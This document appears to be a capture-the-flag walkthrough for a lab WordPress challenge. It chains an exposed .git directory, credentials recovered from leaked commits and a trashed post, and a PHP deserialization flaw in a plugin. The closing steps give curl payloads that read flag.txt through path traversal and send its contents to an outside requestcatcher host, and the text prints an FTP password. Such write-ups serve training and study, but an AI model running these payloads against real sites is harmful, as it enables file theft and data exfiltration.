This time you must be a genius to find me! Keep your eyes open and don't miss any clue...
Solution Steps
Open the website, you will see GitHub frontend
Using dirb, you can find /.git/, /wordpress and you might also find /ftp, by accessing /.git/ you can download the directory/browse it. Leave /wordpress and /ftp for now.
You may try multiple tools on it but no luck, it's empty however, you should get interested in the /.git/config file where you can find the github url for the repo.
There is a note in /.git/description that gives a hint to search for a hidden email directory (.email) in my websites, so by trying to access /.email/ you should be able to find my emails downloader page
You can find multiple emails there but none of them is useful, a hint is found in the input placeholder where it says "email-*", if you try that you will find that multiple emails are downloaded! this means you can type in a pattern (wildcard) that can download multiple emails, if you try "*' you will download all emails BUT, without any hassle, if you open the page source code you will find at the end of it a hint says ?source=? this is obvious it's ?source=1 which will show you the source code of the page.
by analyzing the script you will find it's using php's glob function, if you search on it you will find that it doesn't list hidden files by default, you have to force it using a wildcard (.*), this will download the hidden email file ".antone.eml" which contains a message and a git commit hashes.
Since you know the repo github link you can search the commits there using this link "github.com/USERNMAME/REPO/commit/HASH", this is known to github users or by searching or by checking the single commit on that repo.
By testing all the hashes you will see different dangling commits that contains rabbish data except 2 of hashes that contains a username:password, likely these are for the wordpress page!
revisit /wordpress, try to login on /wp-login (a known wordpress page) with the username and password you found.. cool! it worked!
However, the username says admin but it's not an admin, it's an editor instead, that's fine you can browse the posts/pages still.
Open the posts in admin dashboard /wp-admin, you will find multiple posts with rabbish data again, FINE! if you look around you will find there is a post in trash, check that out!! oh damn it's a love story of carl... read it (sorry about that but it's interesting) you will find the username and password of my ftp! but keep reading below, there is a note saying my ftp can only be accessed from my /ftp page.
carl:FtpUsrCarl1337^^&*!
Enter my ftp, you only have access to wp-content which has themes and plugins, and flag.txt inside one of the plugins (superpowers) but can't be read. Open plugins because it's interested, view the source code of superpowers and you will find a php deserialization!
By learning more about wordpress plugin actions, you will find admin-ajax.php where you can put your payload calling the action of superpowers plugin
The plugin construct a new class of user input with a param and a url, which gives a hint for file reading class with file path param and url to send the data to.
Use any request catcher service and use the following payload to get the data: curl -X POST -d "action=superpowers_handle&data=O:11:"SuperPowers":3:{s:5:"clazz";s:13:"SplFileObject";s:5:"param";s:43:"../wp-content/plugins/supeorpowers/flag.txt";s:3:"url";s:31:"https://test.requestcatcher.com";}" http://localhost/wordpress/wp-admin/admin-ajax.phpcurl -X POST -d "action=superpowers_handle&data=O:11:\"SuperPowers\":3:{s:5:\"clazz\";s:13:\"SplFileObject\";s:5:\"param\";s:42:\"../wp-content/plugins/superpowers/flag.txt\";s:3:\"url\";s:32:\"https://ayham.requestcatcher.com\";}" http://localhost/wordpress/wp-admin/admin-ajax.php you will not get the flag but another hint instead ;)
The real flag.txt in outside wordpress folder so the payload is curl -X POST -d "action=superpowers_handle&data=O:11:\"SuperPowers\":3:{s:5:\"clazz\";s:13:\"SplFileObject\";s:5:\"param\";s:14:\"../../flag.txt\";s:3:\"url\";s:32:\"https://ayham.requestcatcher.com\";}" http://localhost/wordpress/wp-admin/admin-ajax.php
Note: Keep in mind that admin-ajax.php is in /wp-admin which is at the same level of wp-content so the path for the flag must go back first then enter wp-contents
